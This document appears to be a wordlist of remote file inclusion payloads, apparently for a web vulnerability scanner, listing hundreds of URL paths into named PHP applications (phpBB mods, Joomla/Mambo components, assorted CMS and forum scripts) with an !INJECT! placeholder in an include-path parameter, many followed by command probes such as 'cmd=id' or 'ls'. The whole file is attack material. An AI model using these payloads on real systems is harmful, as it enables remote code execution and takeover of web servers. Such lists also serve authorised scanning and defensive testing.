/include/issue_edit.php?INCLUDE_DIR=!INJECT!?
|
||||
/include/lib/lib_slots.php?main_path=!INJECT!
|
||||
/include/lib/lib_stats.php?main_path=!INJECT!?
|
||||
/include/lib/lib_users.php?main_path=!INJECT!?
|
||||
/include/little_news.php3?cfg_include_dir=!INJECT!?
|
||||
/include/livre_include.php?no_connect=lol&chem_absolu=!INJECT!?
|
||||
/include/loading.php?path_include=!INJECT!
|
||||
/include/mail.inc.php?root=!INJECT!
|
||||
/include/menu_builder.php?config[page_dir]=!INJECT!?
|
||||
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=!INJECT!
|
||||
/include/monitoring/engine/MakeXML.php?fileOreonConf=!INJECT!?
|
||||
/include/parser.php?path=!INJECT!
|
||||
/include/pear/IT.php?basepath=!INJECT!?
|
||||
/include/pear/ITX.php?basepath=!INJECT!?
|
||||
/include/pear/IT_Error.php?basepath=!INJECT!?
|
||||
/include/phpxd/phpXD.php?appconf[rootpath]=!INJECT!?&cmd=id
|
||||
/include/prodler.class.php?sPath=!INJECT!???
|
||||
/include/scripts/export_batch.inc.php?DIR=!INJECT!
|
||||
/include/scripts/run_auto_suspend.cron.php?DIR=!INJECT!
|
||||
/include/scripts/send_email_cache.php?DIR=!INJECT!
|
||||
/include/startup.inc.php?root_path=!INJECT!?
|
||||
/include/themes/themefunc.php?myNewsConf[path][sys][index]=!INJECT!?
|
||||
/include/timesheet.php?config[include_dir]=!INJECT!
|
||||
/include/urights.php?CRM_inc=!INJECT!
|
||||
/includes/admin_board2.php?phpbb_root_path=!INJECT!?ls
|
||||
/includes/admin_logger.php?phpbb_root_path=!INJECT!?ls
|
||||
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=!INJECT!?
|
||||
/includes/ajax_listado.php?urlModulo=!INJECT!
|
||||
/includes/archive/archive_topic.php?phpbb_root_path=!INJECT!?
|
||||
/includes/bbcb_mg.php?phpbb_root_path=!INJECT!?
|
||||
/includes/begin.inc.php?PagePrefix=!INJECT!
|
||||
/includes/blogger.php?path_prefix=!INJECT!
|
||||
/includes/class/class_tpl.php?cache_file=!INJECT!?
|
||||
/includes/class_template.php?quezza_root_path=!INJECT!
|
||||
/includes/classes/pctemplate.php?pcConfig[smartyPath]=!INJECT!?cmd
|
||||
/includes/common.inc.php?CONFIG[BASE_PATH]=!INJECT!
|
||||
/includes/common.php?module_root_path=!INJECT!?
|
||||
/includes/common.php?root=!INJECT!?
|
||||
/includes/common.php?root_path=!INJECT!?
|
||||
/includes/config.inc.php?racineTBS=!INJECT!
|
||||
/includes/config/master.inc.php?fm_data[root]=!INJECT!?
|
||||
/includes/connection.inc.php?PagePrefix=!INJECT!
|
||||
/includes/dbal.php?eqdkp_root_path=!INJECT!
|
||||
/includes/events.inc.php?PagePrefix=!INJECT!
|
||||
/includes/footer.html.inc.php?tc_config[app_root]=!INJECT!?
|
||||
/includes/footer.inc.php?PagePrefix=!INJECT!
|
||||
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=!INJECT!
|
||||
/includes/functions.inc.php?sitepath=!INJECT!?
|
||||
/includes/functions.php?location=!INJECT!
|
||||
/includes/functions.php?phpbb_root_path=!INJECT!
|
||||
/includes/functions.php?phpbb_root_path=!INJECT!?
|
||||
/includes/functions/auto_email_notify.php?path_prefix=!INJECT!
|
||||
/includes/functions/html_generate.php?path_prefix=!INJECT!
|
||||
/includes/functions/master.inc.php?fm_data[root]=!INJECT!?
|
||||
/includes/functions/validations.php?path_prefix=!INJECT!
|
||||
/includes/functions_admin.php?phpbb_root_path=!INJECT!?
|
||||
/includes/functions_install.php?vwar_root=!INJECT!
|
||||
/includes/functions_kb.php?phpbb_root_path=!INJECT!?
|
||||
/includes/functions_mod_user.php?phpbb_root_path=!INJECT!?
|
||||
/includes/functions_portal.php?phpbb_root_path=!INJECT!?
|
||||
/includes/functions_user_viewed_posts.php?phpbb_root_path=!INJECT!?
|
||||
/includes/global.php?nbs=!INJECT!?
|
||||
/includes/header.inc.php?PagePrefix=!INJECT!
|
||||
/includes/header.inc.php?dateiPfad=!INJECT!
|
||||
/includes/include_once.php?include_file=!INJECT!
|
||||
/includes/init.php?includepath=!INJECT!?
|
||||
/includes/iplogger.php?phpbb_root_path=!INJECT!?ls
|
||||
/includes/kb_constants.php?module_root_path=!INJECT!
|
||||
/includes/lang/language.php?path_to_root=!INJECT!
|
||||
/includes/lib-account.inc.php?CONF_CONFIG_PATH=!INJECT!?
|
||||
/includes/lib-group.inc.php?CONF_CONFIG_PATH=!INJECT!?
|
||||
/includes/lib-log.inc.php?CONF_CONFIG_PATH=!INJECT!?
|
||||
/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=!INJECT!?
|
||||
/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=!INJECT!?
|
||||
/includes/lib-themes.inc.php?CONF_CONFIG_PATH=!INJECT!?
|
||||
/includes/logger_engine.php?phpbb_root_path=!INJECT!
|
||||
/includes/menuleft.inc.php?PagePrefix=!INJECT!
|
||||
/includes/mkb.php?phpbb_root_path=!INJECT!?ls
|
||||
/includes/morcegoCMS/adodb/adodb.inc.php?path=!INJECT!
|
||||
/includes/morcegoCMS/morcegoCMS.php?fichero=!INJECT!
|
||||
/includes/mx_common.php?module_root_path=!INJECT!?
|
||||
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=!INJECT!
|
||||
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=!INJECT!
|
||||
/includes/pafiledb_constants.php?module_root_path=!INJECT!
|
||||
/includes/pages.inc.php?PagePrefix=!INJECT!
|
||||
/includes/phpdig/includes/config.php?relative_script_path=!INJECT!
|
||||
/includes/profilcp_constants.php?module_root_path=!INJECT!?
|
||||
/includes/settings.inc.php?approot=!INJECT!
|
||||
/includes/template.php?myevent_path=!INJECT!
|
||||
/includes/themen_portal_mitte.php?phpbb_root_path=!INJECT!
|
||||
/includes/tumbnail.php?config[root_ordner]=!INJECT!?
|
||||
/includes/usercp_register.php?phpbb_root_path=!INJECT!?
|
||||
/includes/usercp_viewprofile.php?phpbb_root_path=!INJECT!?
|
||||
/includes/xhtml.php?d_root=!INJECT!?
|
||||
/index.php3?Application_Root=!INJECT!
|
||||
/index.php?1=lol&PAGES[lol]=!INJECT!
|
||||
/index.php?AML_opensite=!INJECT!
|
||||
/index.php?AMV_openconfig=1&AMV_serverpath=!INJECT!
|
||||
/index.php?CONFIG[MWCHAT_Libs]=!INJECT!?
|
||||
/index.php?ConfigDir=!INJECT!
|
||||
/index.php?DIR_PLUGINS=!INJECT!
|
||||
/index.php?G_JGALL[inc_path]=!INJECT!%00
|
||||
/index.php?HomeDir=!INJECT!
|
||||
/index.php?Lang=AR&Page=!INJECT!
|
||||
/index.php?Madoa=!INJECT!?
|
||||
/index.php?RP_PATH=!INJECT!
|
||||
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
|
||||
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=!INJECT!
|
||||
/index.php?abg_path=!INJECT!?
|
||||
/index.php?abs_path=!INJECT!?
|
||||
/index.php?adduser=true&lang=!INJECT!
|
||||
/index.php?adodb=!INJECT!
|
||||
/index.php?ads_file=!INJECT!
|
||||
/index.php?arquivo=!INJECT!
|
||||
/index.php?back=!INJECT!
|
||||
/index.php?base==!INJECT!
|
||||
/index.php?basePath=!INJECT!
|
||||
/index.php?bibtexrootrel=!INJECT!?
|
||||
/index.php?blog_dc_path=!INJECT!
|
||||
/index.php?blog_theme=!INJECT!
|
||||
/index.php?body=!INJECT!
|
||||
/index.php?class_path=!INJECT!?
|
||||
/index.php?classified_path=!INJECT!?
|
||||
/index.php?cms=!INJECT!?
|
||||
/index.php?config["sipssys"]=!INJECT!
|
||||
/index.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/index.php?config[root_ordner]=!INJECT!?cmd=id
|
||||
/index.php?config_atkroot=!INJECT!
|
||||
/index.php?configuration=!INJECT!
|
||||
/index.php?custom_admin_path=!INJECT!?
|
||||
/index.php?dateiPfad=!INJECT!?&cmd=ls
|
||||
/index.php?de=!INJECT!
|
||||
/index.php?dept=!INJECT!
|
||||
/index.php?do=!INJECT!
|
||||
/index.php?exec=!INJECT!?
|
||||
/index.php?ext=!INJECT!
|
||||
/index.php?faq_path=!INJECT!?&cmd=id
|
||||
/index.php?file_name[]=!INJECT!?
|
||||
/index.php?file_path=!INJECT!?
|
||||
/index.php?fileloc=!INJECT!
|
||||
/index.php?from=!INJECT!
|
||||
/index.php?func=!INJECT!?
|
||||
/index.php?function=!INJECT!
|
||||
/index.php?function=custom&custom=!INJECT!
|
||||
/index.php?gOo=!INJECT!
|
||||
/index.php?gen=!INJECT!
|
||||
/index.php?get=!INJECT!
|
||||
/index.php?home_name=!INJECT!
|
||||
/index.php?ilang=!INJECT!?
|
||||
/index.php?inc_dir=!INJECT!
|
||||
/index.php?inc_dir=!INJECT!?
|
||||
/index.php?includeDir=!INJECT!
|
||||
/index.php?includeFooter=!INJECT!
|
||||
/index.php?includesdir=!INJECT!
|
||||
/index.php?insPath=!INJECT!
|
||||
/index.php?lang=!INJECT!
|
||||
/index.php?language=!INJECT!?
|
||||
/index.php?language=en&main_page=!INJECT!
|
||||
/index.php?lizge=!INJECT!?&cmd=ls
|
||||
/index.php?lng=!INJECT!
|
||||
/index.php?load=!INJECT!
|
||||
/index.php?loadpage=!INJECT!
|
||||
/index.php?main_tabid=1&main_content=!INJECT!
|
||||
/index.php?may=!INJECT!
|
||||
/index.php?middle=!INJECT!
|
||||
/index.php?mode=!INJECT!
|
||||
/index.php?modpath=!INJECT!
|
||||
/index.php?module=PostWrap&page=!INJECT!
|
||||
/index.php?mosConfig_absolute_path=!INJECT!
|
||||
/index.php?news7["functions"]=!INJECT!
|
||||
/index.php?news_include_path=!INJECT!
|
||||
/index.php?open=!INJECT!
|
||||
/index.php?option=com_custompages&cpage=!INJECT!?
|
||||
/index.php?page=!INJECT!
|
||||
/index.php?page=!INJECT!%00
|
||||
/index.php?page=!INJECT!?
|
||||
/index.php?page!INJECT!
|
||||
/index.php?page[path]=!INJECT!?&cmd=ls
|
||||
/index.php?pagename=!INJECT!
|
||||
/index.php?pager=!INJECT!
|
||||
/index.php?pagina=!INJECT!?
|
||||
/index.php?path_to_folder=!INJECT!?cmd=id
|
||||
/index.php?pg=!INJECT!?
|
||||
/index.php?phpbb_root_path=!INJECT!
|
||||
/index.php?plugin=!INJECT!
|
||||
/index.php?principal=!INJECT!
|
||||
/index.php?proMod=!INJECT!
|
||||
/index.php?proMod=!INJECT!?cmd
|
||||
/index.php?project=!INJECT!
|
||||
/index.php?repinc=!INJECT!?
|
||||
/index.php?root_prefix=!INJECT!
|
||||
/index.php?root_prefix=!INJECT!?
|
||||
/index.php?section=!INJECT!
|
||||
/index.php?site=!INJECT!
|
||||
/index.php?site_path=!INJECT!
|
||||
/index.php?styl[top]=!INJECT!??
|
||||
/index.php?template=!INJECT!?
|
||||
/index.php?templates_dir=!INJECT!?
|
||||
/index.php?theme=!INJECT!
|
||||
/index.php?themepath=!INJECT!?
|
||||
/index.php?themesdir=!INJECT!
|
||||
/index.php?this_path=!INJECT!?
|
||||
/index.php?txt=!INJECT!
|
||||
/index.php?up=!INJECT!
|
||||
/index.php?url=!INJECT!
|
||||
/index.php?w=!INJECT!
|
||||
/index.php?way=!INJECT!??????????????
|
||||
/index1.php?=!INJECT!
|
||||
/index1.php?inc=!INJECT!
|
||||
/index1.php?inhalt=!INJECT!
|
||||
/index2.php?=!INJECT!
|
||||
/index2.php?content=!INJECT!
|
||||
/index2.php?s=!INJECT!
|
||||
/index2.php?x=!INJECT!
|
||||
/indexinfo.php?bibtexrootrel=!INJECT!?
|
||||
/indexk.php?lib_path=!INJECT!?
|
||||
/info.php?file=!INJECT!
|
||||
/inhalt.php?dateien[news]=!INJECT!?
|
||||
/init.php?API_HOME_DIR=!INJECT!
|
||||
/init.php?scriptpath=!INJECT!?
|
||||
/initialize.php?hmail_config[includepath]=!INJECT!&cmd=dir
|
||||
/initiate.php?abs_path=!INJECT!
|
||||
/install.php?_NE[AbsPath]=!INJECT!
|
||||
/install.php?install_dir=!INJECT!
|
||||
/install/config.php?path=!INJECT!
|
||||
/install/di.php?pathtoserverdata=!INJECT!
|
||||
/install/index.php?content_php=!INJECT!
|
||||
/install/install3.php?database=none&cabsolute_path=!INJECT!
|
||||
/integration/shortstat/configuration.php?SPL_CFG[dirroot]=!INJECT!?
|
||||
/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=!INJECT!?
|
||||
/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=!INJECT!?
|
||||
/interface/billing/billing_process.php?srcdir=!INJECT!?
|
||||
/interface/editors/-custom.php?bField[bf_data]=!INJECT!
|
||||
/interface/editors/custom.php?bField[bf_data]=!INJECT!
|
||||
/interface/new/new_patient_save.php?srcdir=!INJECT!?
|
||||
/intern/admin/?rootdir=!INJECT!
|
||||
/intern/admin/other/backup.php?admin=1&rootdir=!INJECT!
|
||||
/intern/clan/member_add.php?rootdir=!INJECT!
|
||||
/intern/config/forum.php?rootdir=!INJECT!
|
||||
/intern/config/key_2.php?rootdir=!INJECT!
|
||||
/ip.inc.php?type=1&cgipath=!INJECT!
|
||||
/ipeer_site/?page=!INJECT!?
|
||||
/joinus.php?vwar_root=!INJECT!
|
||||
/joinus.php?vwar_root=!INJECT!?&cmd=ls
|
||||
/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=!INJECT!?
|
||||
/joomla_path/components/com_articles.php?absolute_path=!INJECT!?
|
||||
/js/bbcodepress/bbcode-form.php?BBCODE_path=!INJECT!
|
||||
/js/wptable-tinymce.php?ABSPATH=!INJECT!
|
||||
/jscript.php?my_ms[root]=!INJECT!?
|
||||
/kernel/class/ixpts.class.php?IXP_ROOT_PATH=!INJECT!
|
||||
/kernel/loadkernel.php?installPath=!INJECT!
|
||||
/kmitaadmin/kmitam/htmlcode.php?file=!INJECT!?
|
||||
/ktmlpro/includes/ktedit/toolbar.php?dirDepth=!INJECT!
|
||||
/lang/leslangues.php?fichier=!INJECT!
|
||||
/lang_english/lang_main_album.php?phpbb_root_path=!INJECT!?a=
|
||||
/language/lang_english/lang_activity.php?phpbb_root_path=!INJECT!
|
||||
/language/lang_english/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
|
||||
/language/lang_german/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
|
||||
/language/lang_german/lang_main_album.php?phpbb_root_path=!INJECT!?a=
|
||||
/latestposts.php?forumspath=!INJECT!
|
||||
/latex.php?bibtexrootrel=!INJECT!?
|
||||
/layout/default/params.php?gConf[dir][layouts]=!INJECT!?
|
||||
/ldap/authldap.php?includePath=!INJECT!
|
||||
/learnPath/include/scormExport.inc.php?includePath=!INJECT!
|
||||
/lib.editor.inc.php?sys_path=!INJECT!?
|
||||
/lib/Loggix/Module/Calendar.php?pathToIndex=!INJECT!
|
||||
/lib/Loggix/Module/Comment.php?pathToIndex=!INJECT!
|
||||
/lib/Loggix/Module/Rss.php?pathToIndex=!INJECT!
|
||||
/lib/Loggix/Module/Trackback.php?pathToIndex=!INJECT!
|
||||
/lib/action/rss.php?lib=!INJECT!?
|
||||
/lib/activeutil.php?set[include_path]=!INJECT!?
|
||||
/lib/addressbook.php?GLOBALS[basedir]=!INJECT!
|
||||
/lib/armygame.php?libpath=!INJECT!
|
||||
/lib/authuser.php?root=!INJECT!
|
||||
/lib/base.php?BaseCfg[BaseDir]=!INJECT!
|
||||
/lib/connect.php?root=!INJECT!
|
||||
/lib/connected_users.lib.php3?ChatPath=!INJECT!
|
||||
/lib/connected_users.lib.php3?ChatPath=!INJECT!?
|
||||
/lib/db/mysql.class.php?root=!INJECT!
|
||||
/lib/db/postgres.class.php?root=!INJECT!
|
||||
/lib/functions.php?DOC_ROOT=!INJECT!
|
||||
/lib/googlesearch/GoogleSearch.php?APP[path][lib]=!INJECT!?
|
||||
/lib/header.php?DOC_ROOT=!INJECT!
|
||||
/lib/language.php?_LIB_DIR=!INJECT!
|
||||
/lib/live_status.lib.php?ROOT=!INJECT!
|
||||
/lib/misc.php?root=!INJECT!
|
||||
/lib/nl/nl.php?g_strRootDir=!INJECT!
|
||||
/lib/obj/collection.class.php?GLOBALS[application][app_root]=!INJECT!
|
||||
/lib/obj/content_image.class.php?GLOBALS[application][app_root]=!INJECT!
|
||||
/lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
|
||||
/lib/pcltrace.lib.php?g_pcltar_lib_dir=!INJECT!
|
||||
/lib/rs.php?rootpath=!INJECT!
|
||||
/lib/selectlang.php?BBC_LANGUAGE_PATH=!INJECT!
|
||||
/lib/smarty/SmartyFU.class.php?system[smarty][dir]=!INJECT!?
|
||||
/lib/static/header.php?set_menu=!INJECT!
|
||||
/lib/tpl.inc.php?conf[classpath]=!INJECT!
|
||||
/libraries/comment/postComment.php?path[cb]=!INJECT!?a=
|
||||
/libraries/database.php?path=!INJECT!???
|
||||
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=!INJECT!
|
||||
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=!INJECT!
|
||||
/library/authorize.php?login_form=!INJECT!?
|
||||
/library/translation.inc.php?GLOBALS[srcdir]=!INJECT!?
|
||||
/libs/db.php?path_local=!INJECT!
|
||||
/libs/ftp.php?path_local=!INJECT!
|
||||
/libs/lom.php?ETCDIR=!INJECT!
|
||||
/libsecure.php?abs_path=!INJECT!?
|
||||
/license.php?CONFIG[MWCHAT_Libs]=!INJECT!?
|
||||
/link_main.php?phpbb_root_path=!INJECT!
|
||||
/linkadmin.php?page=!INJECT!?
|
||||
/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=!INJECT!?
|
||||
/list.php?phpbb_root_path=!INJECT!
|
||||
/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=!INJECT!
|
||||
/lms_path/modules/welcome.php?_LIB_DIR=!INJECT!
|
||||
/load_lang.php?_SERWEB[configdir]=!INJECT!
|
||||
/load_lang.php?_SERWEB[serwebdir]=!INJECT!
|
||||
/load_phplib.php?_PHPLIB[libdir]=!INJECT!
|
||||
/loader.php?GLOBALS=!INJECT!
|
||||
/local/lib/lcUser.php?LIBDIR=!INJECT!?
|
||||
/log.php?bibtexrootrel=!INJECT!?
|
||||
/login.php3?cl_headers=!INJECT!
|
||||
/login.php?base_dir=!INJECT!
|
||||
/login.php?blog_theme=!INJECT!
|
||||
/login.php?langfile=!INJECT!
|
||||
/login.php?pachtofile=!INJECT!
|
||||
/login.php?srcdir=!INJECT!?
|
||||
/login.php?value=!INJECT!??
|
||||
/lovecms/install/index.php?step=!INJECT!?
|
||||
/m2f/m2f_cron.php?m2f_root_path=!INJECT!
|
||||
/m2f/m2f_forum.php?m2f_root_path=!INJECT!
|
||||
/m2f/m2f_mailinglist.php?m2f_root_path=!INJECT!
|
||||
/m2f/m2f_phpbb204.php?m2f_root_path=!INJECT!
|
||||
/maguz.php?site=!INJECT!
|
||||
/mail/childwindow.inc.php?form=!INJECT!?
|
||||
/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=!INJECT!?
|
||||
/mail_this_entry/mail_autocheck.php?pm_path=!INJECT!?&cmd=ls
|
||||
/main.inc.php?pathtoscript=!INJECT!
|
||||
/main.php?config[search_disp]=true&include_dir=!INJECT!
|
||||
/main.php?id=!INJECT!
|
||||
/main.php?include_path=!INJECT!?
|
||||
/main.php?pageURL=!INJECT!
|
||||
/main.php?pagina=!INJECT!
|
||||
/main/forum/komentar.php?site_path=!INJECT!
|
||||
/main/main.php?pi=!INJECT!
|
||||
/main/ppcbannerclick.php?INC=!INJECT!?
|
||||
/main/ppcclick.php?INC=!INJECT!?
|
||||
/main_prepend.php?_SERWEB[functionsdir]=!INJECT!
|
||||
/mainpage.php?docroot=!INJECT!?cmd
|
||||
/mamboleto.php?mosConfig_absolute_path=!INJECT!
|
||||
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=!INJECT!
|
||||
/manage_songs.php?foing_root_path=!INJECT!
|
||||
/manager/admin/index.php?MGR=!INJECT!
|
||||
/manager/admin/p_ins.php?MGR=!INJECT!
|
||||
/manager/admin/u_ins.php?MGR=!INJECT!
|
||||
/manager/articles.php?_PX_config[manager_path]=!INJECT!
|
||||
/manager/static/view.php?propID=0&INC=!INJECT!
|
||||
/master.php?root_path=!INJECT!
|
||||
/mcNews/admin/header.php?skinfile=!INJECT!
|
||||
/mcf.php?content=!INJECT!
|
||||
/mcnews/admin/install.php?l=!INJECT!
|
||||
/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=!INJECT!
|
||||
/member.php?vwar_root=!INJECT!
|
||||
/member/usercp_menu.php?script_folder=!INJECT!
|
||||
/members/index.php?INC=!INJECT!?
|
||||
/members/registration.php?INC=!INJECT!?
|
||||
/members_help.php?hlp=!INJECT!?
|
||||
/membres/membreManager.php?include_path=!INJECT!?
|
||||
/menu.php3?cl_headers=!INJECT!
|
||||
/menu.php?functions_file=!INJECT!
|
||||
/mep/frame.php?chem=!INJECT!?
|
||||
/microcms/includes/file_manager/special.php?fm_includes_special=!INJECT!
|
||||
/middle.php?file=!INJECT!
|
||||
/migrateNE2toNE3.php?_NE[AbsPath]=!INJECT!
|
||||
/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=!INJECT!?
|
||||
/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=!INJECT!?
|
||||
/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=!INJECT!?
|
||||
/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=!INJECT!?
|
||||
/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=!INJECT!?
|
||||
/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=!INJECT!?
|
||||
/mini-pub.php/front-end/img.php?sFileName=!INJECT!?
|
||||
/minimal/wiki.php?page=!INJECT!?
|
||||
/misc/function.php3?path=!INJECT!?
|
||||
/mitglieder.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/mkportal/include/user.php?MK_PATH=!INJECT!
|
||||
/mkportal/include/user.php?MK_PATH=!INJECT!?
|
||||
/mod/authent.php4?rootpath=!INJECT!
|
||||
/mod/image/index.php?config[pathMod]=!INJECT!
|
||||
/mod/liens/index.php?config[pathMod]=!INJECT!
|
||||
/mod/liste/index.php?config[pathMod]=!INJECT!
|
||||
/mod/special/index.php?config[pathMod]=!INJECT!
|
||||
/mod/texte/index.php?config[pathMod]=!INJECT!
|
||||
/mod_membre/inscription.php?chemin=!INJECT!?
|
||||
/mod_phpalbum/sommaire_admin.php?chemin=!INJECT!?
|
||||
/modernbill/include/html/config.php?DIR=!INJECT!
|
||||
/modifyform.html?code=!INJECT!
|
||||
/mods/business_functions.php?GALLERY_BASEDIR=!INJECT!
|
||||
/mods/config/load.inc.php?moddir=!INJECT!?
|
||||
/mods/http/load.inc.php?moddir=!INJECT!?
|
||||
/mods/ui_functions.php?GALLERY_BASEDIR=!INJECT!
|
||||
/module/forum/forum.php?fd=!INJECT!=';
|
||||
/module/forum/main.php?id=1&main_dir=!INJECT!?&
|
||||
/modules.php?name=!INJECT!&file=article&sid=2
|
||||
/modules/4nAlbum/public/displayCategory.php?basepath=!INJECT!
|
||||
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=!INJECT!
|
||||
/modules/Calendar/admin/update.php?calpath=!INJECT!?
|
||||
/modules/Calendar/calendar.php?calpath=!INJECT!?
|
||||
/modules/Calendar/scheme.php?calpath=!INJECT!?
|
||||
/modules/Discipline/CategoryBreakdownTime.php?FocusPath=!INJECT!
|
||||
/modules/Discipline/CategoryBreakdownTime.php?staticpath=!INJECT!
|
||||
/modules/Discipline/StudentFieldBreakdown.php?staticpath=!INJECT!
|
||||
/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
|
||||
/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
|
||||
/modules/My_eGallery/index.php?basepath=!INJECT!
|
||||
/modules/My_eGallery/public/displayCategory.php?basepath=!INJECT!
|
||||
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=!INJECT!?
|
||||
/modules/NukeAI/util.php?AIbasedir=!INJECT!
|
||||
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=!INJECT!
|
||||
/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
|
||||
/modules/abook/foldertree.php?baseDir==!INJECT!?
|
||||
/modules/addons/plugin.php?doc_root=!INJECT!
|
||||
/modules/admin/include/config.php?doc_root=!INJECT!
|
||||
/modules/admin/include/localize.php?doc_root=!INJECT!
|
||||
/modules/agendax/addevent.inc.php?agendax_path=!INJECT!&cmd=id
|
||||
/modules/bank/includes/design/main.inc.php?bank_data[root]=!INJECT!?
|
||||
/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=!INJECT!
|
||||
/modules/birstday/birst.php?exbb[home_path]=!INJECT!?
|
||||
/modules/birstday/profile_show.php?exbb[home_path]=!INJECT!?
|
||||
/modules/birstday/select.php?exbb[home_path]=!INJECT!?
|
||||
/modules/blocks/headerfile.php?system[path]=!INJECT!
|
||||
/modules/calendar/index.php?inc_dir=!INJECT!
|
||||
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=!INJECT!?
|
||||
/modules/calendar/mod_calendar.php?absolute_path=!INJECT!?
|
||||
/modules/certinfo/index.php?full_path=!INJECT!
|
||||
/modules/character_roster/include.php?mod_root=!INJECT!?
|
||||
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=!INJECT!?
|
||||
/modules/coppermine/themes/default/theme.php?THEME_DIR=!INJECT!
|
||||
/modules/downloads/lib/LM_Downloads.php?pathToIndex=!INJECT!
|
||||
/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
|
||||
/modules/emails/index.php?full_path=!INJECT!
|
||||
/modules/events/index.php?full_path=!INJECT!
|
||||
/modules/fax/index.php?full_path=!INJECT!
|
||||
/modules/files/blocks/latest_files.php?system[path]=!INJECT!
|
||||
/modules/files/index.php?full_path=!INJECT!
|
||||
/modules/files/list.php?full_path=!INJECT!
|
||||
/modules/filters/headerfile.php?system[path]=!INJECT!
|
||||
/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=!INJECT!?
|
||||
/modules/forums/blocks/latest_posts.php?system[path]=!INJECT!
|
||||
/modules/global/inc/content.inc.php?sIncPath=!INJECT!?
|
||||
/modules/groupadm/index.php?full_path=!INJECT!
|
||||
/modules/groups/headerfile.php?system[path]=!INJECT!
|
||||
/modules/guestbook/index.php?CONFIG[local_root]=!INJECT!?
|
||||
/modules/history/index.php?full_path=!INJECT!
|
||||
/modules/home.module.php?repmod=!INJECT!?
|
||||
/modules/horoscope/footer.php?xoopsConfig[root_path]=!INJECT!
|
||||
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=!INJECT!
|
||||
/modules/info/index.php?full_path=!INJECT!
|
||||
/modules/links/blocks/links.php?system[path]=!INJECT!
|
||||
/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
|
||||
/modules/links/submit_links.php?rootdp=zZz&gsLanguage=!INJECT!
|
||||
/modules/log/index.php?full_path=!INJECT!
|
||||
/modules/mail/index.php?full_path=!INJECT!
|
||||
/modules/menu/headerfile.php?system[path]=!INJECT!
|
||||
/modules/messages/index.php?full_path=!INJECT!
|
||||
/modules/mod_as_category.php?mosConfig_absolute_path=!INJECT!
|
||||
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=!INJECT!
|
||||
/modules/mod_calendar.php?absolute_path=!INJECT!
|
||||
/modules/mod_flatmenu.php?mosConfig_absolute_path=!INJECT!
|
||||
/modules/mod_mainmenu.php?mosConfig_absolute_path=!INJECT!
|
||||
/modules/mod_weather.php?absolute_path=!INJECT!?
|
||||
/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=!INJECT!?
|
||||
/modules/newbb_plus/config.php?bbPath[root_theme]=!INJECT!
|
||||
/modules/newbb_plus/votepolls.php?bbPath[path]=!INJECT!
|
||||
/modules/news/blocks/latest_news.php?system[path]=!INJECT!
|
||||
/modules/newusergreatings/pm_newreg.php?exbb[home_path]=!INJECT!?
|
||||
/modules/organizations/index.php?full_path=!INJECT!
|
||||
/modules/phones/index.php?full_path=!INJECT!
|
||||
/modules/pms/index.php?module_path=!INJECT!???
|
||||
/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
|
||||
/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
|
||||
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=!INJECT!?
|
||||
/modules/presence/index.php?full_path=!INJECT!
|
||||
/modules/projects/index.php?full_path=!INJECT!
|
||||
/modules/projects/list.php?full_path=!INJECT!
|
||||
/modules/projects/summary.inc.php?full_path=!INJECT!
|
||||
/modules/punish/p_error.php?exbb[home_path]=!INJECT!?
|
||||
/modules/punish/profile.php?exbb[home_path]=!INJECT!?
|
||||
/modules/reports/index.php?full_path=!INJECT!
|
||||
/modules/search/index.php?full_path=!INJECT!
|
||||
/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!?
|
||||
/modules/settings/headerfile.php?system[path]=!INJECT!
|
||||
